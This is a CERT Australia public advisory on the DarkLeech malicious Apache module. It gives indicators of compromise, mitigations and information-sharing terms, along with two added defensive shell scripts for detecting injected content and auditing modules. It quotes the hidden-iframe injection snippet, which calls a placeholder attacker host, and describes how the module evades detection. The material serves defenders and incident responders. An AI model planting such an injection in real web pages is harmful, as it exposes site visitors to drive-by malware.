WHITE
CERT Australia has received multiple reports of compromised web servers that have had a malicious module added to the Apache HTTP Server installation.
The malicious module causes dynamic content to be injected into random web pages or JavaScript files served on any domains handled by the
Apache installation.
This publication is provided for the situational awareness of partners and to assist businesses with detection, recovery and mitigation.
This document remains the property of the Australian Government. The information contained in this document is for the use of the intended recipient only and may contain confidential or privileged information. If this document has been received in error, that error does not constitute a waiver of any confidentiality, privilege or copyright in respect of this document or the information it contains. This document and the information contained herein cannot be disclosed, disseminated or reproduced in any manner whatsoever without prior written permission from the Assistant Secretary, CERT Australia,
Attorney-General's Department, 3 - 5 National Circuit, Barton ACT 2600.
The material and information in this document is general information only and is not intended to be advice. The material and information is not adapted to any particular person’s circumstances and therefore cannot be relied upon to be of assistance in any particular case. You should base any action you take exclusively on your own methodologies, assessments and judgement, after seeking specific advice from such relevant experts and advisers as you consider necessary or desirable. To the extent permitted by law, the Australian Government has no liability to you in respect of damage that you might suffer that is directly or indirectly related to this document, no matter how arising (including as a result of negligence).
CA-2013-19
This bulletin is designated WHITE. WHITE Alerts are not confidential. They contain information that is for public, unrestricted dissemination, publication, web-posting or broadcast. You may publish the information, subject to copyright and any restrictions or rights noted in the information.
The Apache HTTP Server (Apache) is a free and open-source web server widely deployed on the World Wide Web (WWW) and on internal networks. It is estimated that approximately 65% of all active websites on the Internet are served by Apache. A single Apache instance may serve content for a large number of individual domains, a feature known as “shared hosting”.
The architecture of Apache allows for the inclusion of compiled plugin modules which extend the server’s functionality in a variety of ways, and typically a number of modules are included with standard installations.
CERT Australia has become aware of a number of compromised servers that have had one or more malicious modules added to the Apache configuration. The malicious module(s) insert additional HTML or JavaScript into some served pages that causes client systems to invisibly download content from remote sites. The remote content typically includes exploit code designed to install malicious software on those computers.
As part of its normal activity CERT Australia receives information from a variety of sources regarding compromised web sites and sends email to the domain operators to notify them of the incident. CERT Australia has provided advice to a large number of website operators in the past two weeks that have, as part of the compromise, had one or more malicious modules installed in their Apache web server installation. The module implements relatively sophisticated techniques to avoid being detected by server operators and security researchers or scanning tools.
The malicious module, known as DarkLeech by its author, takes the form of a compiled dynamic shared object and has been observed on both Red Hat- and Debian-derived Linux distributions. The module performs a number of steps to validate the visitor before deciding whether to display the injected content, including checking cookies, user-agent, IP address and its internal block-lists. In one version of the code the malicious content was shown to a given IP address only once every seven days, and IP addresses used by administrative users were automatically blacklisted, making examination of the site by security staff or scanning tools problematic.
The code injected into the site typically takes a form similar to the text below:
<style>.n93vw8rp {position: absolute; left: -1478px; top: -1112px}</style>
<div class="n93vw8rp"><iframe src="http://<IP address or Domain>/<random 32char string>/q.php" width="519" height="517"></iframe></div>
In the code, the Cascading Style Sheet class name, positioning, IFRAME size, random string and IP or domain are all variable. When injected into a site’s included JavaScript files, the code is wrapped in a “document.write()” method.
While some minor variation on this style has been observed, all follow a similar pattern to the code above and all injections seen by CERT Australia have used the “q.php” file in the URL.
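The pattern described above can be checked for offline against saved page content, for example a mirror of the site fetched from outside the network as part of the remote monitoring suggested under mitigations. The script below is an added example and is not part of the CERT Australia bulletin; the sample files it creates are constructed (the host 192.0.2.10 and the 32-character strings are placeholders, not real indicators). A file is flagged only when both the off-screen style rule and an IFRAME whose src ends in /q.php are present, so pages that legitimately use off-screen positioning are not reported on their own.

```shell
#!/bin/sh
# Added example (not from the CERT Australia bulletin): offline check of saved
# page content for the injection pattern described in the advisory. A file is
# flagged only when it contains BOTH an absolute-positioned rule with a negative
# left offset AND an IFRAME whose src ends in /q.php. The IFRAME test also
# matches the document.write() wrapper used in injected JavaScript, where the
# quotes are backslash-escaped.

# Returns 0 (suspicious) when the file matches the pattern, 1 otherwise.
darkleech_scan() {
    f="$1"
    if grep -Eqi 'position:[[:space:]]*absolute;?[[:space:]]*left:[[:space:]]*-[0-9]+px' "$f" &&
       grep -Eqi '<iframe[^>]*src=[^h >]{0,2}https?://[^ >]*/q\.php' "$f"; then
        return 0
    fi
    return 1
}

# Scan every regular file under a directory and print one line per suspicious file.
darkleech_scan_tree() {
    find "$1" -type f | while read -r f; do
        darkleech_scan "$f" && printf 'SUSPICIOUS: %s\n' "$f"
    done
}

# Self-contained demonstration on constructed sample files; prints the hit count.
darkleech_demo() {
    tmp=$(mktemp -d)
    # Constructed sample 1: HTML page carrying the injected block
    # (192.0.2.10 and the 32-char string are placeholders, not real indicators)
    printf '%s\n' '<html><body><p>Welcome</p>' \
        '<style>.n93vw8rp {position: absolute; left: -1478px; top:-1112px} </style>' \
        '<div class="n93vw8rp"><iframe src="http://192.0.2.10/0123456789abcdef0123456789abcdef/q.php" width="519" height="517"></iframe></div>' \
        '</body></html>' > "$tmp/index.html"
    # Constructed sample 2: injected JavaScript wrapped in document.write()
    printf '%s\n' 'document.write("<style>.k2 {position:absolute; left:-1200px; top:-900px}</style><div class=\"k2\"><iframe src=\"http://192.0.2.10/fedcba9876543210fedcba9876543210/q.php\" width=\"500\" height=\"500\"></iframe></div>");' > "$tmp/site.js"
    # Constructed sample 3: clean page using off-screen positioning for an
    # accessibility link plus a legitimate IFRAME, so only one condition holds
    printf '%s\n' '<html><body><div style="position:absolute; left:-9999px">skip to content</div><iframe src="https://example.org/embed"></iframe></body></html>' > "$tmp/clean.html"
    darkleech_scan_tree "$tmp" | wc -l | tr -d ' '
    rm -rf "$tmp"
}
```

Run `darkleech_scan_tree /path/to/mirror` against a copy of the site fetched from an address the module has not seen before; because the module shows the content to a given IP address only once every seven days, a scan from a previously used address may return clean pages.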
There are several files on the systems which may confirm compromise by the DarkLeech malware.
Temporary files
DarkLeech stores temporary files in the system’s /var/tmp directory. These files are known to contain a variety of information regarding banned IPs. The files take the following format: sess_<32 character random character string>
Module location
There are a variety of locations where the Apache HTTP Server may store modules, though each distribution ordinarily limits this to a small number of directories. It is possible for an administrator or malicious actor to include modules from other locations so incident responders should be aware of the locations utilised by a particular server’s installation.
For example, it is common for the following distribution types to use the following folders to store or link to modules:
Red Hat-derived distributions
/usr/lib64/httpd/modules
/usr/lib/
/lib64/
Debian-derived distributions
/usr/lib/apache2/modules
/etc/apache2/mods-available
/etc/apache2/mods-enabled
Additionally, CERT Australia has observed several cases where a “LoadModule” directive has been inserted into a configuration file located in /etc/httpd/conf.d/ or /etc/apache2/conf.d/ directory which loads the DarkLeech module during server start-up.
Identification and verification of the malicious module’s origin can be made by utilising the distribution’s package management tools (such as “rpm” or “dpkg”). Quarantining the module(s) and removing the references from configuration files will prevent further malicious code insertions by DarkLeech. Some files have been observed to make use of the filesystem’s extended attributes to prevent deletion and would need to be modified for successful removal.
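The following helpers, added here as an example and not part of the bulletin, cover the checks described in the temporary files and module location sections: listing sess_ files with a 32-character suffix, enumerating the module paths named in active LoadModule directives, asking rpm or dpkg whether each module file belongs to an installed package, and checking for the immutable attribute (the lsattr "i" flag, cleared with chattr -i on ext filesystems) that would block deletion. The configuration directories and server root passed in the usage line are assumptions; use the values from the installation being examined. Note that PHP also names its session files sess_<id>, so a match in /var/tmp still needs manual review.

```shell
#!/bin/sh
# Added example, not part of the CERT Australia bulletin: triage helpers for the
# indicators described in the advisory (sess_* temporary files, LoadModule
# directives, package ownership of module files, immutable attribute).
# Assumptions: /etc/httpd and /etc/apache2 paths below are examples only.

# List files in a directory named sess_ followed by exactly 32 characters.
# Note: PHP session files use the same naming scheme, so each hit needs review.
list_sess_files() {
    find "$1" -maxdepth 1 -type f -name 'sess_????????????????????????????????' 2>/dev/null | sort
}

# Print the module path of every active (uncommented) LoadModule directive found
# under a config directory, resolving relative paths against the server root.
list_loaded_modules() {
    confdir="$1"; serverroot="$2"
    find "$confdir" -type f -exec grep -hE '^[[:space:]]*LoadModule[[:space:]]' {} + 2>/dev/null |
    awk -v root="$serverroot" '{
        path = $3; sub(/^"/, "", path); sub(/"$/, "", path)
        if (path !~ /^\//) path = root "/" path
        print path
    }' | sort -u
}

# Report whether a file is owned by an installed package ("packaged"), not owned
# by any package ("unpackaged"), or cannot be checked on this host ("unknown").
module_package_status() {
    if command -v rpm >/dev/null 2>&1; then
        rpm -qf "$1" >/dev/null 2>&1 && echo packaged || echo unpackaged
    elif command -v dpkg >/dev/null 2>&1; then
        dpkg -S "$1" >/dev/null 2>&1 && echo packaged || echo unpackaged
    else
        echo unknown
    fi
}

# Report whether the immutable attribute is set (lsattr flag "i"); such a file
# cannot be removed until the flag is cleared with chattr -i.
immutable_status() {
    flags=$(lsattr -d "$1" 2>/dev/null | awk '{print $1}')
    case "$flags" in *i*) echo immutable ;; *) echo normal ;; esac
}

# Walk the active modules and print "<path> <package status> <attribute status>".
audit_modules() {
    list_loaded_modules "$1" "$2" | while read -r mod; do
        printf '%s\t%s\t%s\n' "$mod" "$(module_package_status "$mod")" "$(immutable_status "$mod")"
    done
}

# Self-contained demonstration on a constructed config tree (no real server needed).
triage_demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/conf.d" "$tmp/vartmp"
    printf '%s\n' 'LoadModule ssl_module modules/mod_ssl.so' \
                  '# LoadModule old_module modules/mod_old.so' > "$tmp/conf.d/ssl.conf"
    # constructed module name, not a known indicator
    printf '%s\n' '  LoadModule extra_module "/usr/lib64/httpd/modules/mod_example_extra.so"' > "$tmp/conf.d/zz-extra.conf"
    : > "$tmp/vartmp/sess_0123456789abcdef0123456789abcdef"   # constructed 32-char name
    : > "$tmp/vartmp/sess_short"                               # wrong length, not listed
    list_loaded_modules "$tmp/conf.d" /etc/httpd
    list_sess_files "$tmp/vartmp" | sed "s|^$tmp/vartmp/||"
    rm -rf "$tmp"
}

# Usage on a live host (paths are assumptions):
#   audit_modules /etc/httpd/conf.d /etc/httpd      # Red Hat-derived
#   audit_modules /etc/apache2 /etc/apache2         # Debian-derived
#   list_sess_files /var/tmp
```

A module path reported as "unpackaged" is not proof of compromise (locally built modules are also unpackaged), but combined with a LoadModule line in an unexpected configuration file or an "immutable" attribute it is worth quarantining pending analysis, and rpm -V or dpkg --verify on the owning package catches a module that was replaced in place.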
Other compromised files and services
CERT Australia has received reports that other packages on affected systems have also been compromised, including a number of binaries related to the Secure Shell (SSH) services. Additionally, generic PHP backdoors have also been reported and thus incident responders need to be aware that a malicious Apache module is unlikely to be the only unauthorised file on the system. Depending on the level of compromise, detection of malicious artefacts may only be possible by examining the filesystem when offline.
Although the method of initial compromise related to the DarkLeech module is not currently known, CERT Australia suggests that partners consider the following specific mitigations to protect against this cyber security risk:
Update Operating System, Apache Server and Content Management System software to the latest version or patch levels;
Make use of system file integrity and Rootkit monitoring tools;
Conduct remote website monitoring for detection of injected code;
Consider utilising data backups to recover the system on a new Operating System installation.
After system recovery and mitigation has taken place, change operating system, application and user passwords from a computer system known to be free of malicious software.
Please contact CERT Australia for YARA or ClamAV detection signatures.
CERT Australia suggests that partners consider the following general mitigations to protect against this and other cyber security risks:
Use application white-listing to only allow specifically authorised applications to operate on networks. This mitigation helps prevent malicious software or unauthorised applications from executing.
Ensure that applications and operating systems are kept up-to-date with the latest software patches.
Ensure that users are restricted from, or are administratively prohibited from installing unauthorised software and browsing the internet with administrator privileges.
Remove, disable, or rename any default system accounts wherever possible.
Enforce strong passphrase policies to reduce the risk from brute forcing attempts.
Implement account lockout policies to reduce the risk from brute forcing attempts.
Monitor the creation of administrator level accounts by third-party vendors.
Monitor intrusion detection and/or prevention systems, user logs and server logs for suspicious behaviour.
Use defence-in-depth methods in system design to restrict and control access to individual products and control networks.
Take measures to minimise network exposure for all control system devices. Critical devices should not be directly exposed to the internet. Locate control system networks and remote devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods such as Virtual Private Networks (VPNs) with two factor authentication.
Ensure that computer systems are running antivirus software with the latest antivirus signatures.
If infected, review your antivirus software specific removal guidelines for the malware.
For other mitigation please refer to the “Strategies to mitigate targeted electronic intrusions” publication. [1]
Please contact CERT Australia on 1300 172 499 or info@cert.gov.au if you observe activity corresponding to this publication, or if you have any questions concerning the publication, its content or its application.
[1] https://www.cert.gov.au/advisories
http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/
http://blog.sucuri.net/2013/02/web-server-compromise-debian-distro-identify-and-remove-corruptapache-modules.html
CERT Australia is interested in any feedback you may have with respect to this update and/or the service we provide. Please email info@cert.gov.au or call 1300 172 499 if you would like to provide us with any comments.
NOTE: Organisations need to consider the sensitivity of information sent to this email address as it will be ‘in the clear’ and not secure. If needed, secure communication channels for sensitive or incident related information are available on request.
Partners observing any activity connected to this publication are requested to contact CERT Australia at info@cert.gov.au or 1300 172 499. This information is used to form an understanding of Australia’s cyber threat context. All information is handled internal to the CERT and in strict confidence. Secure communications mechanisms are available on request.
CERT Australia’s primary responsibility is to develop close working relationships with critical infrastructure organisations and businesses that operate systems that are important to Australia’s national interest. In this way, CERT Australia is able to help ensure that important services all Australians rely on in their daily lives, are secure and resilient.
In addition to any internal or regulatory requirements that may be in place, CERT Australia partners can report cyber threats and incidents to CERT Australia on 1300 172 499. This telephone number assists CERT Australia to rapidly respond to incidents impacting those services that are critical to all Australians.
Cyber crime involves the unauthorised access to or impairment of computer systems and is likely to constitute an offence under the Commonwealth’s Criminal Code Act 1995 and/or state and territory criminal laws. If CERT Australia partners suspect they have been the victim of cyber crime they should report it to the Australian Federal Police.
RED - Highly Restricted
Access to and use by your CERT Australia Security Contact Officer only.
You must ensure that your CERT Australia Security Contact Officer does not disseminate or discuss the information with any other person, and you shall ensure that you have appropriate systems in place to ensure that the information cannot be accessed or used by any person other than your CERT Australia Security Contact Officer.

AMBER - Restricted internal access and use only
Subject to the below, you shall only make ‘AMBER’ Alerts available to your employees on a “needs to know basis” strictly for your internal purposes only to assist in the protection of your information and communications technology (ICT) systems.
In some instances you may be provided with ‘AMBER’ Alerts which are marked to allow you to also disclose it to your contractors or agents on a “needs to know basis” strictly for your internal purposes only to assist in the protection of your ICT systems.

GREEN - Restricted to closed groups and subject to confidentiality
You may share ‘GREEN’ Alerts with external organisations, information exchanges or individuals in the network security, information assurance or critical network infrastructure community that agree to maintain the confidentiality of the information in the Alert.
You may not publish or post on the World Wide Web or otherwise release it in circumstances where confidentiality may not be maintained.

WHITE - Not restricted
‘WHITE’ Alerts are not confidential. They contain information that is for public, unrestricted dissemination, publication, web-posting or broadcast. You may publish the information, subject to copyright and any restrictions or rights noted in the information.

NOT CLASSIFIED
Any information received from CERT Australia that is not classified in accordance with the Traffic Light Protocol must be treated as ‘AMBER’ classified information unless otherwise agreed in writing by the Attorney-General’s Department.